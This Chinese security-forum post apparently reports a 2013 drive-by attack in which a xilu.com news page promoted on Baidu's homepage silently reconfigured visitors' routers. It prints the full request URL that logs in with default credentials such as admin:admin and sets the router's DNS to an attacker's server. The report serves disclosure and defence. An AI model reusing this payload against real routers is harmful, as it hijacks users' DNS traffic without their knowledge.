频道栏目
首页 > 安全 > 网站安全 > 正文

西陆网(xilu.com)利用百度首页新闻劫持用户本地路由器DNS

2013-11-02 22:05:46      个评论       作者:ccc008
收藏   我要投稿
今天通过百度新版首页,访问西陆网的一条新闻后,发现本地路由器DNS被劫持为121.157.39.111。于是具体分析了一下劫持的过程。

由于是百度首页推荐的新闻,影响人群应该不小。报告给百度,是希望百度把这个垃圾网站踢出百度新闻源,免得祸害人呀

 

1、在百度首页,访问了一条 “赵红霞真实照片”的新闻。

 

网页地址 http://shizheng.xilu.com/20130917/1000010000094910.html

 

 

2、通过firebug分析,发现页面包含了如下链接。

 

 

http://admin:admin@192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=&dnsserver=121.157.39.111&dnsserver2=114.114.114.114&Save=%B1%A3+%B4%E6

 

多次访问发现admin:admin,会变化,例如admin:123456,也就是利用路由器默认密码不断尝试修改路由器dns为121.157.39.111、114.114.114.114。

 

通过Referer可以看出,这个修改dns的链接来源于http://gz.dagushu.com/center.html。

 

 

 

3、切换firebug到html,发现以框架形式包含了http://gz.dagushu.com/center.html

4、最终存在弱口令的路由器dns被修改。整个劫持过程完成。

 

 


 

补充:进一步分析,发现恶意代码通过

 

<script src="http://newspage.xilu.com/model/xilu_bottom.js" type="text/javascript" language="JavaScript"> 引入,属于西陆网的域名,可见其有一定的主观故意。

 

修复方案:

把西陆网踢出百度新闻源

上一篇:新浪微人脉存储型XSS漏洞(长度限制绕过)与越权双剑合并
下一篇:ASP学生成绩查询系统可直接执行SQL语句
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站